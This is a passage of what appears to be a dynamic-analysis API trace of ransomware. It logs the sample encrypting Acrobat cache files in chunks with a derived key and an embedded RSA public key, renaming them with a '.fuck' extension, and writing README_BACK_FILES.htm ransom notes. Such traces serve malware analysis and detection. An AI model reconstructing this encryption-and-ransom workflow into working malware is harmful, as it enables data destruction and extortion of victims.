pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.085] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.085] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.085] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.085] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.086] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.086] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.086] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.086] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.086] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.086] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.086] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.086] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.086] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.086] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.086] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.086] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.086] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.086] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.086] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.087] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.087] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.087] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.087] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.087] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.087] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.087] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.087] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.087] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.087] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.087] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.087] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.087] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.087] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.087] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.088] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.088] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.088] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.088] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.088] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.088] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.088] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x243, lpOverlapped=0x0) returned 1 [0242.088] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x243, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x250) returned 1 [0242.088] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x250, lpOverlapped=0x0) returned 1 [0242.088] CloseHandle (hObject=0x5d44) returned 1 [0242.088] CloseHandle (hObject=0x5d40) returned 1 [0242.093] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr65536.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr65536.dat.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr65536.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr65536.dat"), bFailIfExists=0) returned 1 [0242.106] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr65536.dat", dwFileAttributes=0x0) returned 1 [0242.106] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr65536.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr65536.dat.gsg")) returned 1 [0242.109] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr65536.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr65536.dat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr65536.dat.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr65536.dat.fuck")) returned 1 [0242.111] CryptDestroyHash (hHash=0x28e7df8) returned 1 [0242.111] CryptDestroyKey (hKey=0x28e82b8) returned 1 [0242.111] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0242.111] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0242.111] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0242.111] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\ToolsSearchCacheRdr\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x28bee18 [0242.112] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0242.112] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0242.112] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0242.113] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\ToolsSearchCacheRdr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\toolssearchcacherdr\\readme_back_files.htm")) returned 0xffffffff [0242.113] AreFileApisANSI () returned 1 [0242.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0242.113] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\ToolsSearchCacheRdr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\toolssearchcacherdr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0242.113] GetFileType (hFile=0x5d40) returned 0x1 [0242.114] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0242.115] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0242.115] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0242.115] GetLastError () returned 0x0 [0242.115] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\UserCache.bin" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\usercache.bin")) returned 0x20 [0242.116] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\UserCache.bin", dwFileAttributes=0x80) returned 1 [0242.117] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\UserCache.bin" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\usercache.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0242.117] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\UserCache.bin.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\usercache.bin.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0242.119] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\UserCache.bin.gsg", dwFileAttributes=0x2) returned 1 [0242.119] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6348) returned 1 [0242.122] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0242.122] lstrlenA (lpString="cjCYuiydaGDqRLBosfDTjZpnzMlQm") returned 29 [0242.122] CryptHashData (hHash=0x28bf018, pbData=0x28571c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0242.122] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28bf1d8) returned 1 [0242.122] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0242.122] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0242.122] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f3fb0) returned 1 [0242.123] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3fb0, dwCertEncodingType=0x1, pInfo=0x2935e00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935e30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935e38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28bf218) returned 1 [0242.123] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0242.123] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4148*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f4148*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0242.123] WriteFile (in: hFile=0x5d44, lpBuffer=0x28f4148*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x28f4148*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0242.124] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.133] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.133] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.151] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.152] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.152] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.152] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.152] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.152] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.152] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.152] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.152] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.152] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.152] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.152] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.153] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.153] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.153] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.153] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.153] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.153] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.153] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.153] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.153] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.153] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, 